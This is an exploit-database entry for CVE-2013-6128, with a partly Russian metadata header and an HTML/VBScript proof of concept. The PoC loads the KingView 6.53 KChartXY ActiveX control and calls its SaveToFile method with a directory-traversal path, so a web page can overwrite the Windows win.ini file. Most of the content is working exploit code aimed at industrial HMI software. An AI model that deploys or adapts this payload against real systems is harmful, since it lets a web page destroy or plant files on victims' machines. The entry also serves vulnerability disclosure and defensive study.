Exploit KingView 6.53 - 'KChartXY' ActiveX File Creation / Overwrite

[Exploiter]

EDB-ID

28085

Проверка EDB

1. Пройдено

Автор

BLAKE

Тип уязвимости

LOCAL

Платформа

WINDOWS

CVE

cve-2013-6128

Дата публикации

2013-09-04

<!--
KingView ActiveX Control (KChartXY) Remote File Creation / Overwrite
Vendor: http://www.wellintech.com
Version: KingView 6.53 
Tested on: Windows XP SP3 / IE
Download: http://www.wellintech.com/documents/KingView6.53_EN.zip
Author: Blake

CLSID: A9A2011A-1E02-4242-AAE0-B239A6F88BAC
ProgId: KCHARTXYLib.KChartXY
Path: C:\Program Files\KingView\KChartXY.ocx
MemberName: SaveToFile
Safe for scripting: False
Safe for init: False
Kill Bit: False
IObject safety not implemented

Description: Proof of concept overwrites the win.ini file
-->
<html>
<object classid='clsid:A9A2011A-1E02-4242-AAE0-B239A6F88BAC' id='target' ></object>
<script language='vbscript'>

arg1="..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\..\WINDOWS\win.ini"

target.SaveToFile arg1 

</script>